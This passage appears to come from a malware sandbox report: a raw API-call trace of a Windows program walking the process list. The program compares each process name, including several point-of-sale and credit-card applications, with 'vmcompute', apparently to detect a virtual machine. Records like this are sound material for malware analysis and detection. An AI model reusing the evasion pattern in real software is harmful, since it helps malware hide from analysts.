cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="afr38.exe", lpUsedDefaultChar=0x0) returned 10 [0102.228] lstrcpyA (in: lpString1=0x567fabc, lpString2="afr38.exe" | out: lpString1="afr38.exe") returned="afr38.exe" [0102.228] StrStrIA (lpFirst="afr38.exe", lpSrch="vmcompute") returned 0x0 [0102.228] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0102.229] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0102.229] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3570308 [0102.229] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x3570308, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aldelo.exe", lpUsedDefaultChar=0x0) returned 11 [0102.229] lstrcpyA (in: lpString1=0x567fabc, lpString2="aldelo.exe" | out: lpString1="aldelo.exe") returned="aldelo.exe" [0102.229] StrStrIA (lpFirst="aldelo.exe", lpSrch="vmcompute") returned 0x0 [0102.229] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0102.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0102.230] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x3570200 [0102.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x3570200, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ccv_server.exe", lpUsedDefaultChar=0x0) returned 15 [0102.230] lstrcpyA (in: lpString1=0x567fabc, lpString2="ccv_server.exe" | out: lpString1="ccv_server.exe") returned="ccv_server.exe" [0102.230] StrStrIA (lpFirst="ccv_server.exe", lpSrch="vmcompute") returned 0x0 [0102.231] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0102.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0102.232] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x357f8a0 [0102.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x357f8a0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="centralcreditcard.exe", lpUsedDefaultChar=0x0) returned 22 [0102.232] lstrcpyA (in: lpString1=0x567fabc, lpString2="centralcreditcard.exe" | out: lpString1="centralcreditcard.exe") returned="centralcreditcard.exe" [0102.232] StrStrIA (lpFirst="centralcreditcard.exe", lpSrch="vmcompute") returned 0x0 [0102.232] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0102.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0102.233] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x357f600 [0102.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x357f600, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="creditservice.exe", lpUsedDefaultChar=0x0) returned 18 [0102.233] lstrcpyA (in: lpString1=0x567fabc, lpString2="creditservice.exe" | out: lpString1="creditservice.exe") returned="creditservice.exe" [0102.233] StrStrIA (lpFirst="creditservice.exe", lpSrch="vmcompute") returned 0x0 [0102.233] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0102.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0102.235] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3570338 [0102.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x3570338, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="edcsvr.exe", lpUsedDefaultChar=0x0) returned 11 [0102.235] lstrcpyA (in: lpString1=0x567fabc, lpString2="edcsvr.exe" | out: lpString1="edcsvr.exe") returned="edcsvr.exe" [0102.235] StrStrIA (lpFirst="edcsvr.exe", lpSrch="vmcompute") returned 0x0 [0102.235] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0102.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0102.236] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x35701e8 [0102.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x35701e8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fpos.exe", lpUsedDefaultChar=0x0) returned 9 [0102.236] lstrcpyA (in: lpString1=0x567fabc, lpString2="fpos.exe" | out: lpString1="fpos.exe") returned="fpos.exe" [0102.236] StrStrIA (lpFirst="fpos.exe", lpSrch="vmcompute") returned 0x0 [0102.236] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0102.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0102.238] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3570440 [0102.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x3570440, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="isspos.exe", lpUsedDefaultChar=0x0) returned 11 [0102.238] lstrcpyA (in: lpString1=0x567fabc, lpString2="isspos.exe" | out: lpString1="isspos.exe") returned="isspos.exe" [0102.238] StrStrIA (lpFirst="isspos.exe", lpSrch="vmcompute") returned 0x0 [0102.238] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0102.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0102.240] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357f840 [0102.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x357f840, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mxslipstream.exe", lpUsedDefaultChar=0x0) returned 17 [0102.240] lstrcpyA (in: lpString1=0x567fabc, lpString2="mxslipstream.exe" | out: lpString1="mxslipstream.exe") returned="mxslipstream.exe" [0102.240] StrStrIA (lpFirst="mxslipstream.exe", lpSrch="vmcompute") returned 0x0 [0102.240] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0102.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0102.241] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3570248 [0102.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x3570248, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="omnipos.exe", lpUsedDefaultChar=0x0) returned 12 [0102.241] lstrcpyA (in: lpString1=0x567fabc, lpString2="omnipos.exe" | out: lpString1="omnipos.exe") returned="omnipos.exe" [0102.241] StrStrIA (lpFirst="omnipos.exe", lpSrch="vmcompute") returned 0x0 [0102.241] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0102.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0102.243] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3570218 [0102.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x3570218, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spcwin.exe", lpUsedDefaultChar=0x0) returned 11 [0102.243] lstrcpyA (in: lpString1=0x567fabc, lpString2="spcwin.exe" | out: lpString1="spcwin.exe") returned="spcwin.exe" [0102.243] StrStrIA (lpFirst="spcwin.exe", lpSrch="vmcompute") returned 0x0 [0102.243] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0102.244] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0102.244] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x357f880 [0102.245] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x357f880, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spgagentservice.exe", lpUsedDefaultChar=0x0) returned 20 [0102.245] lstrcpyA (in: lpString1=0x567fabc, lpString2="spgagentservice.exe" | out: lpString1="spgagentservice.exe") returned="spgagentservice.exe" [0102.245] StrStrIA (lpFirst="spgagentservice.exe", lpSrch="vmcompute") returned 0x0 [0102.245] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0102.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0102.246] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3570320 [0102.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x3570320, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="utg2.exe", lpUsedDefaultChar=0x0) returned 9 [0102.246] lstrcpyA (in: lpString1=0x567fabc, lpString2="utg2.exe" | out: lpString1="utg2.exe") returned="utg2.exe" [0102.246] StrStrIA (lpFirst="utg2.exe", lpSrch="vmcompute") returned 0x0 [0102.246] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="saying.exe")) returned 1 [0102.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0102.248] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3570458 [0102.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x3570458, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="saying.exe", lpUsedDefaultChar=0x0) returned 11 [0102.248] lstrcpyA (in: lpString1=0x567fabc, lpString2="saying.exe" | out: lpString1="saying.exe") returned="saying.exe" [0102.248] StrStrIA (lpFirst="saying.exe", lpSrch="vmcompute") returned 0x0 [0102.248] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ripe.exe")) returned 1 [0102.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0102.249] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3570470 [0102.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x3570470, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ripe.exe", lpUsedDefaultChar=0x0) returned 9 [0102.249] lstrcpyA (in: lpString1=0x567fabc, lpString2="ripe.exe" | out: lpString1="ripe.exe") returned="ripe.exe" [0102.249] StrStrIA (lpFirst="ripe.exe", lpSrch="vmcompute") returned 0x0 [0102.249] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="acoustic.exe")) returned 1 [0102.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0102.251] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3570260 [0102.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x3570260, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="acoustic.exe", lpUsedDefaultChar=0x0) returned 13 [0102.251] lstrcpyA (in: lpString1=0x567fabc, lpString2="acoustic.exe" | out: lpString1="acoustic.exe") returned="acoustic.exe" [0102.251] StrStrIA (lpFirst="acoustic.exe", lpSrch="vmcompute") returned 0x0 [0102.251] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mail.exe")) returned 1 [0102.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0102.252] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3570278 [0102.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x3570278, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mail.exe", lpUsedDefaultChar=0x0) returned 9 [0102.253] lstrcpyA (in: lpString1=0x567fabc, lpString2="mail.exe" | out: lpString1="mail.exe") returned="mail.exe" [0102.253] StrStrIA (lpFirst="mail.exe", lpSrch="vmcompute") returned 0x0 [0102.253] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0102.278] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0102.278] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35702a8 [0102.278] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x35702a8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0102.278] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0102.278] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="vmcompute") returned 0x0 [0102.278] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0102.279] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35702c0 [0102.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35702c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0102.280] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0102.280] StrStrIA (lpFirst="svchost.exe", lpSrch="vmcompute") returned 0x0 [0102.280] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0102.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0102.281] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35702d8 [0102.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x35702d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 12 [0102.281] lstrcpyA (in: lpString1=0x567fabc, lpString2="dllhost.exe" | out: lpString1="dllhost.exe") returned="dllhost.exe" [0102.281] StrStrIA (lpFirst="dllhost.exe", lpSrch="vmcompute") returned 0x0 [0102.281] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0102.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0102.282] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3570350 [0102.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3570350, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0102.282] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0102.283] StrStrIA (lpFirst="taskhostw.exe", lpSrch="vmcompute") returned 0x0 [0102.283] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0102.284] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0102.284] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35703f8 [0102.284] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x35703f8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UsoClient.exe", lpUsedDefaultChar=0x0) returned 14 [0102.284] lstrcpyA (in: lpString1=0x567fabc, lpString2="UsoClient.exe" | out: lpString1="UsoClient.exe") returned="UsoClient.exe" [0102.284] StrStrIA (lpFirst="UsoClient.exe", lpSrch="vmcompute") returned 0x0 [0102.284] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0102.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0102.286] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3570410 [0102.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3570410, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0102.286] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0102.286] StrStrIA (lpFirst="taskhostw.exe", lpSrch="vmcompute") returned 0x0 [0102.286] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0102.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0102.287] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x357f500 [0102.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, 